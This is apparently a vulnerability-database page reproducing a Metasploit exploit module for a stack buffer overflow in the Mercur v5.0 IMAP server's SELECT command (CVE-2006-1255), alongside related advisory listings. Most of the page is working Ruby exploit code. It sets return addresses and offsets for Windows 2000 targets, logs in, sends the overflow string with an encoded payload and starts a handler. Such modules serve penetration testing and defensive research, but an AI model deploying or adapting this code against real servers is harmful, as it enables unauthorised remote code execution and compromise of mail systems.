Lucene search
K

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow

🗓️ 31 Dec 2006 00:10:16Reported by Jacopo Cervini <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 36 Views

Mercur v5.0 IMAP SP3 SELECT Buffer Overflow vulnerability discovered by Tim Taylo

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Mercur Mailserver Remote Overflow
20 Mar 200600:00
nessus
Tenable Nessus
MERCUR Messaging IMAP Service Multiple Command Remote Overflow
22 Mar 200600:00
nessus
Circl
CVE-2006-1255
25 Aug 201000:00
circl
CVE
CVE-2006-1255
19 Mar 200601:00
cve
Cvelist
CVE-2006-1255
19 Mar 200601:00
cvelist
Exploit DB
Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit)
20 Sep 201000:00
exploitdb
Exploit DB
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
25 Aug 201000:00
exploitdb
Metasploit
Mercur Messaging 2005 IMAP Login Buffer Overflow
27 Dec 200622:43
metasploit
NVD
CVE-2006-1255
19 Mar 200601:02
nvd
OpenVAS
Mercur Mailserver/Messaging <= 5.0 IMAP Overflow Vulnerability
22 Aug 200800:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
      'Description'    => %q{
          Mercur v5.0 IMAP server is prone to a remotely exploitable
        stack-based buffer overflow vulnerability. This issue is due
        to a failure of the application to properly bounds check
        user-supplied data prior to copying it to a fixed size memory buffer.
        Credit to Tim Taylor for discover the vulnerability.
      },
      'Author'         => [ 'Jacopo Cervini <acaro[at]jervus.it>' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-1255' ],
          [ 'OSVDB', '23950' ],
          [ 'BID', '17138' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
          ['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2006-03-17'))

  end

  def exploit
    sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"
    sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])
    sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8)
    sploit << payload.encoded + rand_text_alpha_upper(453)

    info = connect_login

    if (info == true)
      print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
      sock.put(sploit + "\r\n")
    else
      print_status("Not falling through with exploit")
    end

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation